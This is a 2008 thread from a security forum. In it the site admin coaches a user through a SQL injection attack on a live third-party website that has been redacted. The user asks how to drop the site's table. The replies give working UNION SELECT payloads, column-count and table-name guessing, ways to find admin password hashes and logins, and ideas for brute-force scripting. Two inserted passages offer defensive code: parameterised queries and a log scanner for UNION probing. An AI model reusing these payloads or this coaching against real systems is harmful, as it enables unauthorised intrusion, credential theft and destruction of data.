Waraxe IT Security Portal
www.waraxe.us Forum Index -> Newbies corner -> Does this tell me anything useful

Posted: Mon May 26, 2008 12:37 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

Here is what I am getting when I run the queries:

http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+mysql.user--+

Quote:
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM mysql.user-- . SELECT command denied to user '**REVEALS_A_USERNAME**'@'localhost' for table 'user'


http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+USER(),2,3,4,5,6,7,8--+
Quote:
**REVEALS_A_USERNAME**@localhost
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes


http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+DATABASE(),2,3,4,5,6,7,8--+

Quote:
**DIFFERENT_USERNAME**
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes


The other queries all fail with output like this:
Quote:

Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM user-- . Table '**SECOND_USERNAME**.user' doesn't exist


I know one table is called 'poll'. I have a suspicion that this is part of a phpbb db, but table names like phpbb_users, phpbb_posts etc don't give me any results.

You guys are good, very good ;) Is there a way I can just drop the table 'poll'?

Posted: Mon May 26, 2008 12:58 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

1. No, you can't drop that sql table in an easy way.
2. You must analyze that website - is it running some forum, blog or CMS? Can you identify which one? Are there user login possibilities anywhere? Try "victim.com/admin", "victim.com/admin.php" and other traditional admin interface places. You must guess the sql table name before getting deeper! For example, in the case of phpbb and many other forums and CMS-s there is a prefix which can be different from the default. This can be bruteforced (if it's short) or just guessed. And one way to reveal the database schema is to provoke more sql errors. So play with various URL-s and GET/POST parameters and try to get as many different sql errors as possible.
And try other "usual" table names:
news, sessions,logins,data,pages,page,people,post,posts,conf,config,pic,pictures, etc etc. This can get you better "inside look" of database internals.
One more thing: "SECOND_USERNAME" is actually database name. Does it show, what software engine is used?

Posted: Mon May 26, 2008 1:45 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

Quote:
second_username
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)


Is what it shows, and I would imagine that it would be the database name.
So now I need to guess the tables to get any further?

Posted: Mon May 26, 2008 1:58 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes. There are multiple scenarios:

1. That website does not contain a web-based admin interface at all, same with any user accounts. It means that specific sql injection is basically useless.
2. Website contains admin interface. If you can guess database table with admin password hashes, then maybe you can log in as admin. Next step depends on specific admin interface features.
3. Website contains user accounts. In this case user data theft is possible, but i'm not sure, that this will help you.
So your best shot is still possible admin interface.

Posted: Mon May 26, 2008 2:11 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

xxx.xxx.xxx.xxx/admin redirects to phpbb 2.0.22(?) login page

It is running phpbb, but there is a chance it is a separate database.
The 'poll' table is getting info from the phpbb. These are the results of a number of polls that have been posted.

It has 'Cpanel' running on the server. xxx.xxx.xxx.xxx:443 confirms it.

Is there a tool/automation to brute force a table name in the url:

http://www.xxxxxxxx.com/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**VARIABLE**--+

Posted: Mon May 26, 2008 2:42 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

1. Try this:

Code:

http://yourtarget.com/phpbb/memberlist.php?start=-1


If you are lucky, then nice sql error message pops up.

2. Search google:

Code:

site:yourtarget.com "SQL Error"

Posted: Mon May 26, 2008 2:52 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

No go on either :(

There are some remnants of an old ikonboard forum at the site, but it redirects to phpbb 2.0.22

Other than guessing the tables, I'm stuffed!

Thank you all for your help anyway. Appreciate your time Gentlemen.

Posted: Wed May 28, 2008 7:52 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

Gentlemen, I have a limited grasp of SQL. Can you break this down a little for me, so I can understand it properly?

Quote:
id=-1

Why are we saying minus 1 (-1)?

Quote:
What are the '+' signs for?

Is it to encode the URL spaces?

+UNION+ALL+SELECT+ (I'm ok with that)

Quote:
COUNT(*),2,3,4,5,6,7,8

I don't get this?

Quote:
+FROM+users--+

Why the two dashes on the end of 'users'

I know this must be tedious to answer, but it would help me no end. I've made a basic search but I can't make it out.

Thank you for your help, if you get the time.

Posted: Wed May 28, 2008 8:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

1. "id=-1" is id, which is probably invalid (usually id-s are >=1), so main sql query will fetch 0 results and it's easier to fetch our own data (with UNION).

2. "+UNION+SELECT+" is the same as " UNION SELECT " or "%20UNION%20SELECT%20". It's just my personal habit, because "+" signs as urlencoded spaces look somehow cleaner in the url :)

3. "COUNT(*),2,3,4,5,6,7,8" - which part don't you understand? It's a traditional UNION attack with 8 columns, and as i am trying to guess the table name and i don't know any field names either, COUNT(*) is very useful - it will work without field name(s). Now if we are lucky and the database has the right table, then we can see the count of rows; in the case of a users table it's the count of user entries. And now, when we have the table name, the next thing is guessing the fields:

"UNION+ALL+SELECT+COUNT(username),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(name),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(login),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pass),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pwd),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(lpassword),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(hash),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(md5),2,3,4,5,6,7,8+FROM+users"
... etc etc etc ... till you have all wanted field names

4. "+FROM+users--+" is again my personal habit and style concerning ending comments. You know that sql injection trick from tutorials:

"UNION ALL SELECT 1,2,3,4/*"
That's commenting out using C-style comments "/*"
But mysql allows other comment types too, like two dashes and one space. And again space can be urlencoded as "+".
So it's kind of good looking commenting out: "--+" :)
It can be "/*", "--%20" or "-- ", they all work as expected.

So as you can see i am not just copycat-ing sql injection tutorials, but instead develop new styles and tricks.
One example: collation errors. They are common problems in way of sql injection exploitation and usual counter measure is "CAST" or "CONVERT".
But in case of mysql version 5.x i suggest UNHEX(HEX(field)) construction.
View user's profile Send private message Send e-mail Visit poster's website
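
An added example, not part of the thread: the query text in the error messages shows the `id` parameter being pasted into the SQL string, which is what lets the 8-column UNION explained above run at all. The sketch reproduces that on a constructed in-memory sqlite3 database (an assumption; the site ran MySQL, and the `users` table and function names are hypothetical) next to a version that validates and binds the value.

```python
import sqlite3

COLS = "question, response1, response2, response3, votes1, votes2, votes3, date"

def make_db():
    """Constructed stand-in database: sqlite3 in memory, sample rows are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE poll (id INTEGER PRIMARY KEY, question TEXT,
            response1 TEXT, response2 TEXT, response3 TEXT,
            votes1 INT, votes2 INT, votes3 INT, date TEXT);
        INSERT INTO poll VALUES (1, 'Best editor?', 'vi', 'emacs', 'nano',
            5, 6, 7, '30 Nov 2007');
        CREATE TABLE users (username TEXT, hash TEXT);
        INSERT INTO users VALUES ('alice', 'x'), ('bob', 'y');
    """)
    return db

def poll_vulnerable(db, raw_id):
    # Pattern revealed by the error message: request input becomes SQL syntax.
    return db.execute(f"SELECT {COLS} FROM poll WHERE id = {raw_id}").fetchall()

def poll_hardened(db, raw_id):
    # Validate the type, then bind the value; input can only ever be data.
    try:
        poll_id = int(raw_id)
    except ValueError:
        return []  # caller shows a generic "not found", never the query text
    return db.execute(f"SELECT {COLS} FROM poll WHERE id = ?", (poll_id,)).fetchall()

# The thread's parameter value after URL decoding ("+" is a space).
INJECTED = "-1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM users-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", poll_vulnerable(db, INJECTED))  # row count of users leaks
    print("hardened:  ", poll_hardened(db, INJECTED))    # rejected before any SQL runs
    print("hardened:  ", poll_hardened(db, "1"))         # normal request still works
```

The hardened handler also never echoes the failed statement back to the client; the "Could not execute query: ..." output quoted in this thread is what handed over the column list and table name.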

Posted: Thu May 29, 2008 9:09 am
tinman
Active user
Joined: May 11, 2008
Posts: 37

So the count(*) is a wildcard to return any field.

The 1,2,3,4,5,6,7,8 returns 8 columns ( so 1,2,3,4,5,6,7,8,9 would return 9 and 1,2,3,4 would return 4?) Why do we settle for 8? Is there a reason for this?

Understand +

Understand --+ (I was taught # in SQL but yours looks a whole lot better :) )

Thank you again.

Posted: Thu May 29, 2008 9:15 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

1. COUNT(*) is just "count all rows":

http://dev.mysql.com/doc/refman/5.0/en/counting-rows.html

2. The needed column number (in the case of the example it's eight) must be found previously :)

"UNION ALL SELECT 1--+" --> error message about column count mismatch
"UNION ALL SELECT 1,2--+" --> error message
"UNION ALL SELECT 1,2,3--+" --> error message
...
"UNION ALL SELECT 1,2,3,4,5,6,7,8--+" --> no error message about column count mismatch
View user's profile Send private message Send e-mail Visit poster's website
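
Added example, not from the thread: the column-count probing listed above leaves a distinctive trail in web server logs, one client sending UNION SELECT lists of growing width. This sketch scans constructed (client, request) pairs for that pattern; the addresses, paths and function names are made up for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed (client, request) pairs standing in for access-log entries.
SAMPLE_LOG = [
    ("203.0.113.7", "/archive.php?id=-1+UNION+ALL+SELECT+1--+"),
    ("203.0.113.7", "/archive.php?id=-1+UNION+ALL+SELECT+1,2--+"),
    ("203.0.113.7", "/archive.php?id=-1%20UNION%20ALL%20SELECT%201,2,3/*"),
    ("203.0.113.7", "/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+users--+"),
    ("198.51.100.4", "/archive.php?id=12"),
    ("198.51.100.4", "/archive.php?id=3"),
]

# UNION [ALL] SELECT <list> [FROM <table>], then a comment marker or end of input.
UNION_RE = re.compile(
    r"\bUNION\s+(?:ALL\s+)?SELECT\s+(.*?)(?:\s+FROM\s+([\w.]+))?\s*(?:--|/\*|#|$)",
    re.I | re.S)

def column_count(select_list):
    """Count top-level select-list items; commas inside parentheses do not split."""
    depth = commas = 0
    for ch in select_list:
        depth += (ch == "(") - (ch == ")")
        commas += (ch == "," and depth == 0)
    return commas + 1

def find_union_probes(log):
    """Per client: UNION SELECT request count, column counts tried, tables named."""
    hits = defaultdict(lambda: {"requests": 0, "column_counts": set(), "tables": set()})
    for client, path in log:
        query = unquote_plus(path.partition("?")[2])  # "+" and %20 both become a space
        m = UNION_RE.search(query)
        if m:
            rec = hits[client]
            rec["requests"] += 1
            rec["column_counts"].add(column_count(m.group(1)))
            if m.group(2):
                rec["tables"].add(m.group(2).lower())
    return dict(hits)

def enumerating_clients(log, min_distinct=3):
    """Clients that tried several different column counts, i.e. are sizing the UNION."""
    return sorted(c for c, r in find_union_probes(log).items()
                  if len(r["column_counts"]) >= min_distinct)
```

Decoding before matching matters here because the same probe appears with "+", "%20" or a literal space, and with any of the comment terminators discussed earlier in the thread.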

Posted: Thu May 29, 2008 5:05 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37

Ha Ha Ha!!! Fantastic!

Thank you for that! You keep knocking until you get in!

If only I could find a brute force script to keep knocking the door for this:

-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**BRUTE FORCE**--+

Perhaps I should learn how to write shell scripts? How would I work out to keep looping on the response would be my first problem I guess.

Posted: Thu May 29, 2008 10:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

My personal favorite is php, so i'd use php CLI as programming platform. But anything else can be used.
One thing to mention - mysql is evolving and right now there is less 5.x version and more 4.x in use. But i'm sure that after 1-2 years most mysql servers will be 5.x+. So the information_schema system catalog ...

http://dev.mysql.com/doc/refman/5.0/en/information-schema.html

... will be widely available and there will be no need for guessing or bruteforce anymore :)
I love progress...

Posted: Fri May 30, 2008 7:02 am
tinman
Active user
Joined: May 11, 2008
Posts: 37

waraxe wrote:
I love progress...


ROFL!

Now here is a funny thing. We established that this was a Mysql 4 x server.

I execute this, just out of curiosity:
Quote:
http://www.xxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+information_schema.tables--+

and I get this:

Quote:
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM information_schema.tables-- . SELECT command denied to user 'xxxxx_xxxxx'@'localhost' for table 'tables'

I guess this is because only the root user has access to it on 4-x?

Posted: Fri May 30, 2008 11:26 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

In 4.x there should not be "information_schema" at all.
Try this:

Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables--+


Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+test_schema.tables--+


Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.test_tables--+


And describe error messages.